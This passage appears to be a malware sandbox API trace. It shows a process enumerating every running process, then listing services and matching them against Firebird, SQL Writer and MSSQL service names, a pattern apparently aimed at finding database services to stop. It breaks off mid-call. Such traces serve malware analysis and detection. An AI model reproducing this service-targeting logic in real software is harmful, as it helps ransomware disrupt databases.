th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.021] lstrlenW (lpString="services.exe") returned 12 [0218.021] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.022] lstrlenW (lpString="lsass.exe") returned 9 [0218.022] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.024] lstrlenW (lpString="svchost.exe") returned 11 [0218.024] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0218.024] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0218.024] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0218.025] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0218.025] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.026] lstrlenW (lpString="svchost.exe") returned 11 [0218.026] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.027] lstrlenW (lpString="dwm.exe") returned 7 [0218.027] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.027] lstrlenW (lpString="svchost.exe") returned 11 [0218.027] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.028] lstrlenW (lpString="svchost.exe") returned 11 [0218.028] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.029] lstrlenW (lpString="svchost.exe") returned 11 [0218.029] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.030] lstrlenW (lpString="svchost.exe") returned 11 [0218.030] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.030] lstrlenW (lpString="svchost.exe") returned 11 [0218.030] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.031] lstrlenW (lpString="svchost.exe") returned 11 [0218.031] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.032] lstrlenW (lpString="svchost.exe") returned 11 [0218.032] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.032] lstrlenW (lpString="svchost.exe") returned 11 [0218.033] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.033] lstrlenW (lpString="svchost.exe") returned 11 [0218.033] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.034] lstrlenW (lpString="spoolsv.exe") returned 11 [0218.034] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.041] lstrlenW (lpString="svchost.exe") returned 11 [0218.041] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.041] lstrlenW (lpString="svchost.exe") returned 11 [0218.041] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.042] lstrlenW (lpString="audiodg.exe") returned 11 [0218.042] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.043] lstrlenW (lpString="sihost.exe") returned 10 [0218.043] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.044] lstrlenW (lpString="svchost.exe") returned 11 [0218.044] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.044] lstrlenW (lpString="taskhostw.exe") returned 13 [0218.044] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.045] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0218.045] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0218.046] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0218.046] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.046] lstrlenW (lpString="explorer.exe") returned 12 [0218.046] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0218.047] lstrlenW (lpString="Memory Compression") returned 18 [0218.047] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0218.048] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0218.048] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.049] lstrlenW (lpString="SearchUI.exe") returned 12 [0218.049] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.049] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0218.050] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.050] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0218.050] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0218.051] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0218.051] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0218.052] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0218.052] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.052] lstrlenW (lpString="conhost.exe") returned 11 [0218.052] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0218.053] lstrlenW (lpString="roof competitive.exe") returned 20 [0218.053] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0218.054] lstrlenW (lpString="trustees.exe") returned 12 [0218.054] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0218.055] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0218.055] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0218.056] lstrlenW (lpString="isbn.exe") returned 8 [0218.056] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0218.057] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0218.057] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0218.058] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0218.058] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0218.059] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0218.059] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0218.060] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0218.060] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0218.060] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0218.060] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0218.061] lstrlenW (lpString="playstation iraq.exe") returned 20 [0218.061] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0218.062] lstrlenW (lpString="harbor.exe") returned 10 [0218.062] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0218.063] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0218.063] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0218.063] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0218.063] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0218.064] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0218.064] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0218.065] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0218.065] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0218.066] lstrlenW (lpString="larent.exe") returned 10 [0218.066] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0218.067] lstrlenW (lpString="stereo.exe") returned 10 [0218.067] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0218.068] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0218.068] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0218.069] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0218.069] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0218.069] lstrlenW (lpString="state.exe") returned 9 [0218.069] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0218.070] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0218.070] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.071] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0218.071] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.072] lstrlenW (lpString="taskhostw.exe") returned 13 [0218.072] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.073] lstrlenW (lpString="sppsvc.exe") returned 10 [0218.073] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.074] lstrlenW (lpString="svchost.exe") returned 11 [0218.074] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0218.075] lstrlenW (lpString="Pg.exe") returned 6 [0218.075] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0218.076] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0218.076] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.077] lstrlenW (lpString="conhost.exe") returned 11 [0218.077] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0218.077] lstrlenW (lpString="cmd.exe") returned 7 [0218.077] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.078] lstrlenW (lpString="conhost.exe") returned 11 [0218.078] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0218.079] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0218.079] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0218.094] lstrlenW (lpString="conhost.exe") returned 11 [0218.094] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0218.095] CloseHandle (hObject=0x424) returned 1 [0218.095] Sleep (dwMilliseconds=0x1f4) [0219.461] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bcd8 [0219.462] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0219.462] GetLastError () returned 0xea [0219.462] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x2372d70 [0219.463] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0219.463] CloseServiceHandle (hSCObject=0x236bcd8) returned 1 [0219.463] lstrlenW (lpString="Appinfo") returned 7 [0219.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0219.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0219.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0219.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0219.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0219.464] lstrlenW (lpString="AppXSvc") returned 7 [0219.464] lstrcmpiW 